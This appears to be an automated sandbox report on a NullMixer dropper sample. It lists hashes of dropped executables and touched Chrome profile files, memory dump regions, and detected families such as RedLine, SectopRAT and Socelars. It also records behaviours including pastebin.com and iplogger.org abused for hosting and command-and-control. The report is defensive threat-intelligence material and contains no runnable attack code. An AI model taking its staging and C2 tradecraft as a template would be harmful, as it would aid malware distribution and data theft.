memory/4604-84-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4900-87-0x0000000002C20000-0x0000000002C56000-memory.dmp
memory/4900-88-0x00000000052F0000-0x0000000005918000-memory.dmp
memory/4604-83-0x00000000007A0000-0x000000000082F000-memory.dmp
memory/4604-81-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4900-89-0x0000000005920000-0x0000000005942000-memory.dmp
memory/4900-91-0x0000000005B30000-0x0000000005B96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkqk0uvo.yhe.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4900-90-0x0000000005AC0000-0x0000000005B26000-memory.dmp
memory/4900-101-0x0000000005BA0000-0x0000000005EF4000-memory.dmp
memory/4604-80-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4604-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4604-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4604-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20fbc038b0b02ea.exe
| MD5 | a98672182143436478fdb3806ef6cd5a |
| SHA1 | 5d93bb55d9e7915afb11361f42a4c9c6393718b3 |
| SHA256 | 2010cb8b8069ae8e5527526b36f28b78766473b71b67d601351eb361dbef8528 |
| SHA512 | 0d2de593d1e194895833396c49efe194fca56afa3396e6aa41f8a51e961ea4f1ca97697ace0625ea97f5dfe7092b75049c58e582dda122cbc7966cb9a5d18892 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2060ea1c5d8fae8aa.exe
| MD5 | ba8541c57dd3aae16584e20effd4c74c |
| SHA1 | 5a49e309db2f74485db177fd9b69e901e900c97d |
| SHA256 | dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c |
| SHA512 | 1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209d5bfbb2.exe
| MD5 | d08cc10c7c00e13dfb01513f7f817f87 |
| SHA1 | f3adddd06b5d5b3f7d61e2b72860de09b410f571 |
| SHA256 | 0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d |
| SHA512 | 0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20e095683c2b3a0c.exe
| MD5 | 44cfc728f9fbacd834c9b10ce768d41a |
| SHA1 | 6589a1435a2ba5ec11a312de5f339597831227d0 |
| SHA256 | 874c4eab9d0422ee52a1e02e4e95b07805a143dda5a54a19c6a122580aabdb68 |
| SHA512 | dd899e05bcbfaec1c3f46011367e000f3edfca1c2f542f9ed55bcbd136142940733f8aa8cd67bd5f647329195ffb843a255713dae362bc44a817734163409113 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri208f5f140853548.exe
| MD5 | 7c6b2dc2c253c2a6a3708605737aa9ae |
| SHA1 | cf4284f29f740b4925fb2902f7c3f234a5744718 |
| SHA256 | b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba |
| SHA512 | 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209c4b463b.exe
| MD5 | a729d63514511766fcdd2de19cdbd017 |
| SHA1 | 737827e5c0ab0adc287d3b3bb16d26a9a42f0939 |
| SHA256 | 6dda16414ec5a7f6908f6088ea5edb7c67b024c3f695fbf7048ab823bcfee728 |
| SHA512 | ad6bc65c950a94383f3f1d987508d22167343db632412b74d4734482916a7c18981dc8d84c57109f0882f6c5c6f280db876bafd24837f06996614d1bb9ce6ee2 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20c0c46650eeb2a.exe
| MD5 | ecc773623762e2e326d7683a9758491b |
| SHA1 | ad186c867976dc5909843418853d54d4065c24ba |
| SHA256 | 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838 |
| SHA512 | 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2002ce5f91c761.exe
| MD5 | 39fbed3967544cc6a59e1d1152cdcc35 |
| SHA1 | b9e974a506f3be7fc78574ae008e7686093eb82d |
| SHA256 | cb9c63211d26b56dff5651f9fc8a872fd9aab26dfa32df84086aa86ab39810e6 |
| SHA512 | cade223df33187f024aaf18794f5890c08cc3387f3e3417908220cc690a55275b558a83e219fb45c98b5c728746fb211d6a68eec0a7e62d08f4b05cc07b8ede3 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20d5530575e8aa3ed.exe
| MD5 | 7c20266d1026a771cc3748fe31262057 |
| SHA1 | fc83150d1f81bfb2ff3c3d004ca864d53004fd27 |
| SHA256 | 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46 |
| SHA512 | e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ba391d4469.exe
| MD5 | 85ef31a707d583032b8526d16e8883a8 |
| SHA1 | 16beed53fc46bf75cf4081d73dc843f4d8298569 |
| SHA256 | bce2f04e884c2dd6e799861898546be00a745fa1e743ce51044d2232065d2409 |
| SHA512 | 8e2ca4555b5741400559244bd37e0be09b18e246026e3d0507b02956c27fdc9dabca55672cbd8a52a5832fe66c6da3fe1e649a1cfad101f9c655aa20aa1da31b |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri209f6924af86d795.exe
| MD5 | 1902e1df4ecf3bf7bcfc0c53b992cd24 |
| SHA1 | a0c9cde0b2113466a820fa6ebcccfdcd93b26b97 |
| SHA256 | c3bf5a1821e67a8d734ce91cb75b6878457f69ea3211a6c1405bfd30759f2720 |
| SHA512 | 37dbad160b91e1fc2079a46e77c8d261ad4f4dbbdfcc4d1c5ea70beeb10d271d48a13ef3b3c76a4878b4187d08a66097cb5a8cf77531a4c0df5914d3be2296b6 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri2050293ea5.exe
| MD5 | 7d44a083f0e81baf1ecb264b93bdc9a5 |
| SHA1 | 4dd23b40065e2ccfbdd4c79386d7e2d37a53efce |
| SHA256 | 073b1354e582f8fd758bd128d764fd305d50d76fc45147eb1240e8a402ed1da5 |
| SHA512 | 245827096522beb8b54a60ad3549cd7509ab35fe650cb2f7d6b48f4cf76430c25c3162ff284d78b19d2351457bbfbd0d2d71751abeb703fef3e2736ab6825c82 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri200ae385720d3.exe
| MD5 | 8aaec68031b771b85d39f2a00030a906 |
| SHA1 | 7510acf95f3f5e1115a8a29142e4bdca364f971f |
| SHA256 | dc901eb4d806ebff8b74b16047277b278d8a052e964453f5360397fcb84d306b |
| SHA512 | 4d3352fa56f4bac97d5acbab52788cad5794c9d25524ee0a79ef55bfc8e0a275413e34b8d91f4de48aedbe1a30f8f47a0219478c4620222f4677c55cf29162df |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20ee0a6fe195bd09.exe
| MD5 | 06ee576f9fdc477c6a91f27e56339792 |
| SHA1 | 4302b67c8546d128f3e0ab830df53652f36f4bb0 |
| SHA256 | 035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8 |
| SHA512 | e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616 |
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\Fri20109b9e174d0fc.exe
| MD5 | 37a1c118196892aa451573a142ea05d5 |
| SHA1 | 4144c1a571a585fef847da516be8d89da4c8771e |
| SHA256 | a3befd523e1e2f4e6f8fce281963f5efb85fe54d85ba67746cc58823d479e92a |
| SHA512 | aac6321582dac5d82cbdb197c20370df3436cf884bea44cbc6d156fd6c4fa99340a3fa866862b83fb0866b31a1e4ebdd73c462972beeb299d4af95592c1d94db |
memory/4900-103-0x00000000061F0000-0x000000000623C000-memory.dmp
memory/4900-102-0x00000000061A0000-0x00000000061BE000-memory.dmp
memory/4604-75-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4604-73-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4604-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4604-74-0x000000006B440000-0x000000006B4CF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS460164F7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
memory/4604-66-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2672-135-0x0000000000E60000-0x0000000000E68000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-Q08JN.tmp\Fri20d5530575e8aa3ed.tmp
| MD5 | 9303156631ee2436db23827e27337be4 |
| SHA1 | 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa |
| SHA256 | bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4 |
| SHA512 | 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f |
memory/2776-145-0x0000000004B70000-0x0000000004BE6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-LFQQP.tmp\idp.dll
| MD5 | b37377d34c8262a90ff95a9a92b65ed8 |
| SHA1 | faeef415bd0bc2a08cf9fe1e987007bf28e7218d |
| SHA256 | e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f |
| SHA512 | 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc |
memory/2776-155-0x0000000004B50000-0x0000000004B6E000-memory.dmp
memory/2776-144-0x0000000000470000-0x00000000004E2000-memory.dmp
memory/3636-141-0x0000000002330000-0x0000000002336000-memory.dmp
memory/3636-132-0x00000000001E0000-0x00000000001F8000-memory.dmp
memory/208-130-0x0000000000400000-0x0000000000414000-memory.dmp
memory/2776-156-0x00000000053C0000-0x0000000005964000-memory.dmp
memory/1084-161-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4256-167-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/208-168-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4900-180-0x0000000006790000-0x00000000067AE000-memory.dmp
memory/4952-183-0x0000000003710000-0x0000000003732000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-PATC0.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
memory/4900-182-0x0000000007440000-0x00000000074E3000-memory.dmp
memory/4952-181-0x0000000003480000-0x00000000034A4000-memory.dmp
memory/4900-170-0x00000000704D0000-0x000000007051C000-memory.dmp
memory/4900-169-0x0000000006750000-0x0000000006782000-memory.dmp
memory/4900-193-0x0000000007B70000-0x00000000081EA000-memory.dmp
memory/4952-195-0x0000000006250000-0x0000000006868000-memory.dmp
memory/4952-197-0x00000000068F0000-0x00000000069FA000-memory.dmp
memory/4952-198-0x0000000006A00000-0x0000000006A3C000-memory.dmp
memory/4604-208-0x0000000064940000-0x0000000064959000-memory.dmp
memory/4604-207-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/4604-206-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/4604-205-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/4604-202-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/4604-199-0x0000000000400000-0x000000000051C000-memory.dmp
memory/4952-196-0x00000000068D0000-0x00000000068E2000-memory.dmp
memory/4900-194-0x0000000007210000-0x000000000722A000-memory.dmp
memory/4900-209-0x0000000007550000-0x000000000755A000-memory.dmp
memory/4900-213-0x0000000007740000-0x00000000077D6000-memory.dmp
memory/4900-221-0x00000000076D0000-0x00000000076E1000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Fri20fbc038b0b02ea.exe.log
| MD5 | e5352797047ad2c91b83e933b24fbc4f |
| SHA1 | 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772 |
| SHA256 | b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c |
| SHA512 | dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827 |
memory/4984-231-0x0000000000400000-0x0000000000422000-memory.dmp
memory/4568-232-0x0000000000400000-0x00000000016BC000-memory.dmp
memory/4900-233-0x0000000007720000-0x000000000772E000-memory.dmp
memory/4900-234-0x00000000077E0000-0x00000000077F4000-memory.dmp
memory/4900-235-0x0000000007820000-0x000000000783A000-memory.dmp
memory/4900-236-0x0000000007810000-0x0000000007818000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ScMeAP.SU
| MD5 | ac6ad5d9b99757c3a878f2d275ace198 |
| SHA1 | 439baa1b33514fb81632aaf44d16a9378c5664fc |
| SHA256 | 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d |
| SHA512 | bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b |
C:\Users\Admin\AppData\Local\Temp\20L2vNO.2
| MD5 | 4bf3493517977a637789c23464a58e06 |
| SHA1 | 519b1fd3df0a243027c8cf4475e6b2cc19e1f1f4 |
| SHA256 | ccf0f8d1770436e1cd6cdcfa72d79a791a995a2f11d22bdf2b1e9bfbdd6f4831 |
| SHA512 | 4d094e86e9c7d35231020d97fbcc7d0c2f748d1c22819d1d27dabbb262967800cc326911a7e5f674461d9932e244affe9a01fa9527f53248e5867490e0e09501 |
C:\Users\Admin\AppData\Local\Temp\ykifDQA.1
| MD5 | 7b25b2318e896fa8f9a99f635c146c9b |
| SHA1 | 10f39c3edb37b848974da0f9c1a5baa7d7f28ee2 |
| SHA256 | 723b3b726b9a7394ac3334df124a2033536b108a8eb87ec69e0a6e022c7dcd89 |
| SHA512 | a3b294e93e9d0a199af21ad50af8290c0e0aaa7487019480ca3ffd75aa8ad51c4d33612ec69275e4fa2273ca5e33fdfdf263bb0ce81ad43ce092147118fa8ca6 |
C:\Users\Admin\AppData\Local\Temp\7TcIneJp.0
| MD5 | 6c83f0423cd52d999b9ad47b78ba0c6a |
| SHA1 | 1f32cbf5fdaca123d32012cbc8cb4165e1474a04 |
| SHA256 | 4d61a69e27c9a8982607ace09f0f507625f79050bdf7143c7fe0701bf1fab8ae |
| SHA512 | e3d1537f4b22ceadfef3b30216b63320b397a179ab9d5f1eb66f93811a2717ee1fb6222989f610acd4c33fae6078c3df510022b5748a4f1d88ebf08c12f9deec |
C:\Users\Admin\AppData\Local\Temp\gUVIl5.SCh
| MD5 | 973c9cf42285ae79a7a0766a1e70def4 |
| SHA1 | 4ab15952cbc69555102f42e290ae87d1d778c418 |
| SHA256 | 7163bfaaaa7adb44e4c272a5480fbd81871412d0dd3ed07a92e0829e68ec2968 |
| SHA512 | 1a062774d3d86c0455f0018f373f9128597b676dead81b1799d2c2f4f2741d32b403027849761251f8389d248466bcd66836e0952675adcd109cc0e950eaec85 |
C:\Users\Admin\AppData\Local\Temp\NuWKoG5w.G
| MD5 | 4d073e6b58b793121a7d814201c17aa8 |
| SHA1 | 924c01c515cdfb2c89948519113db84f272fb1b8 |
| SHA256 | b36d1359231ad7ad5d9bbcb908e2547c50d6bc724ac1e0b4a1da315752823a06 |
| SHA512 | 4ea6a32bc7c23398e72108e3fe22475eb541777defdebf541f8a1b0a20a79891b8d8b9bb361affd14488d5f9d42f8eb949c0e385958da9b203839440813c3cd1 |
C:\Users\Admin\AppData\Local\Temp\pajqyzJ.o
| MD5 | 394f820f75a9a6164a0ceff2db6037a1 |
| SHA1 | 5843110d8ce5e27f0f3d7781151891bff9131664 |
| SHA256 | 31a92c9d65ee868ca0b23ee616a590f3cd4ac22aef1846f33eda8abac4e8d007 |
| SHA512 | 48ce7ee8114e126aa3f679f465bef64d062c88365607b1afe87cbb2faed88ec88109a2edcd610a72b937172d60668208cdf66fbfce640ffe25547294d1884b44 |
memory/4212-282-0x0000000000400000-0x00000000016D5000-memory.dmp
memory/4952-283-0x0000000000400000-0x00000000016E0000-memory.dmp
memory/4836-291-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/1084-290-0x0000000000400000-0x0000000000414000-memory.dmp
memory/372-296-0x00000000031F0000-0x0000000003295000-memory.dmp
memory/372-300-0x00000000032A0000-0x0000000003332000-memory.dmp
memory/372-297-0x00000000032A0000-0x0000000003332000-memory.dmp
memory/2120-301-0x00000000033B0000-0x0000000003458000-memory.dmp
memory/2120-302-0x0000000003460000-0x00000000034F5000-memory.dmp
memory/2120-305-0x0000000003460000-0x00000000034F5000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
memory/372-311-0x0000000000400000-0x000000000054C000-memory.dmp
memory/2120-312-0x0000000000400000-0x0000000000629000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | c7c64b0aba4e28fc1d19b1b3946656e5 |
| SHA1 | afa03f1afe3b76218c3168db01df9fca215ae479 |
| SHA256 | 027fd946bc166f858df84bf63ebd0849eaeb90e0d253068479feec73a86b2e49 |
| SHA512 | 285146a880982803e158a89035aea1f10348c52ad2b793123be1a415a632ef267d9edc604fc3cc0ffd3b88e5ed3b494a1139ff1be4f0a239d05ec7e1b6a4e014 |
memory/4212-328-0x0000000000400000-0x00000000016D5000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
| MD5 | 9e34422f9c8265667ca6ca3d2c42d309 |
| SHA1 | 3aa07dbe2841a2581f924b396fa33d16d0ea3418 |
| SHA256 | 017867bd13deba49bce68be6ce49eb569bbe7ab64d6e89f791a6726afc0468e9 |
| SHA512 | 76e841e084d94ecab8a485518e08c53a4e1ce706bb0a4a68d8e7b33844a264d746b6d581802e14d006830881bde7eaa0548124f9287b57611f80839367263401 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | d9f690c37b23c1b814e8680fb6b38399 |
| SHA1 | 61add990d379b5ca69ced3de467a235d443e5d53 |
| SHA256 | 2d2206128bda01cc595dba614d7bf474e0ef94e2212c540bac28d003818e7a64 |
| SHA512 | 73fefdc16b605b55932983324acc5fa8ff7d279561a63a3f83c9766cc3e1a10cf0a3780b8c42c7f28e5e3aa34d16a6031dc739e2e24184e4b5cd5a3320df3ac2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 76abc17f0bcde2c84ab37dbc56be647d |
| SHA1 | d20e2d96957428fe8a8ea8ee8abf8711c562571b |
| SHA256 | 14b78bd9d9c2cc2329e8b05012e6fa074a0aa093c67ec01a45f74576c1fb20c3 |
| SHA512 | 8149da4a8a5f3303337d6f624adae472c874b3a0f59267df003fbdd2d2e7bd11a55900f4d75cd2de25d0f1f0232127d88ab6817368faa7c512d9510be8a219e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 72122163c28c1c1cac772d3607627d4f |
| SHA1 | 471c61343a2ede860cc2c1d758d637e3e8421712 |
| SHA256 | 8a174015857b64d77564a9d42d8d74b6b0363e5cad4b3f734100fbb349ba6675 |
| SHA512 | 382d3620f6fd997c5556702e3fdec04f7ccf86f2fa77c85da9d0acafa945de5ede70e537789b61314d0dc58aa360cef2178bb706ffe92cb59cc39efede394ef1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 83f8f491d5d35969b8206dea572b7a1d |
| SHA1 | e4eaf6154c071850f0dbf29ea7d37b45e705c4ea |
| SHA256 | eb0eb2b6eed9ea622af864d3550030ffee646ce3a7aad564af00a5230ce88845 |
| SHA512 | a21f568a86ad3b485599ebb8cbd6ad8a26223cdb6ee13bb17b78de4d31586df1845285bdc7dd18700550a8e72568487af68404033307f7429811db147b2474e8 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 14a93595e828530a1f7d7f1fd010105c |
| SHA1 | a2071864fe4a2c3b918be8766d40f574a23ff46d |
| SHA256 | 94b248bb81e1035d32b54b1ebdc1d02e2e3fea0fca2c786c5f95dca0f6c350e8 |
| SHA512 | 4c0dc70898c5c7e9d3f558e093a7b237d3724f32a7afb75691ed373ec27928f61be9a63717e6140062ccecc6339bfdbf18586b4ee45b93203abf3608ffc23e99 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 9aa8a12d7d9f0bb33508cd5fa94206cb |
| SHA1 | f289f40ae63f1068933a38919fee8b0f1cbf2409 |
| SHA256 | 19c2f8b477b0b9893c73996d1faf0cab6eab6a09ecf2ffc83fb9047218e72836 |
| SHA512 | c09cd129073be5049bb6b2aaa460315441ef3c4a1cbe41dcd5063e6c1abfeecb19ef4bb0a355e0324e7763135f33f5bfd4d04a5a73754fd98d121a1dcec8b329 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 981d9a31d9e3938565495e6fb20bb2e6 |
| SHA1 | 92a5c56f9f8e63d6df68981ed12df725f37ecb5e |
| SHA256 | c066d94e421ba4a559f6b645a0659cb8c4f3b5df6232adde030a50affd3a347d |
| SHA512 | 0e3353d433bb7f16a9d62930018ac57c09e433bc187d4e3705b2d84845b5ae58859b6b0ce08a437e58b5e1514b123b1be2db01c480354b8df70c38dd40c021a2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | df347779f16bf23a871ed250540a4a8b |
| SHA1 | d59e42d6515eeec4b35cb96953e799d47d4ca7dc |
| SHA256 | 0c927db30119f4afed5dab73069fa47836dd76b4e6e0efb99b5677c1dbbf562a |
| SHA512 | 87a890601fb37c443bad6bbf88d597463cd10d2a78a636a805c389b72f122b94a9d5052a2acb1e8e035accfe1914f8a80126c7420218efe22e67c42b7eee4a04 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 92a83667a2fd3edfbef91e5e8a3432c8 |
| SHA1 | ed07ebbd410f6b393498342bb1311e3a9fd1ccef |
| SHA256 | becb484c72261cc0f3b631e57d35870ecee4e430ec9518cd3aa017a09074b1bd |
| SHA512 | 92e0e303175099bf438b944517f925a47176fe70f7a360093ae68895bc57d18d32dbcd18560da3675298023106d21890383eda2653315a4cd15c2d127b49b435 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 08ed2ee12303e1f2a6e941e8a08438f2 |
| SHA1 | f8f3ae4c185fcd2f242165910d34ec0c08f05158 |
| SHA256 | 9fbff9fdaa2cfedcc7e36f7985303d3b3f413dff25d28fba41f654baa2382697 |
| SHA512 | 2507779244c20a95744ed96763f64279406c61271e5d212d30e21c9c7d8fe5f7672de80197267047cdd6b44de8fc1fe98441241af47ddfe20a9f20260136afca |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-24 21:35
Reported
2024-11-24 21:37
Platform
win7-20240708-en
Max time kernel
4s
Max time network
121s
Command Line
Signatures
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Fabookie
Fabookie family
GCleaner
Gcleaner family
NullMixer
Nullmixer family
OnlyLogger
Onlylogger family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sectoprat family
Socelars
Socelars family
Socelars payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
OnlyLogger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Looks up geolocation information via web service
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\setup_install.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe | N/A |
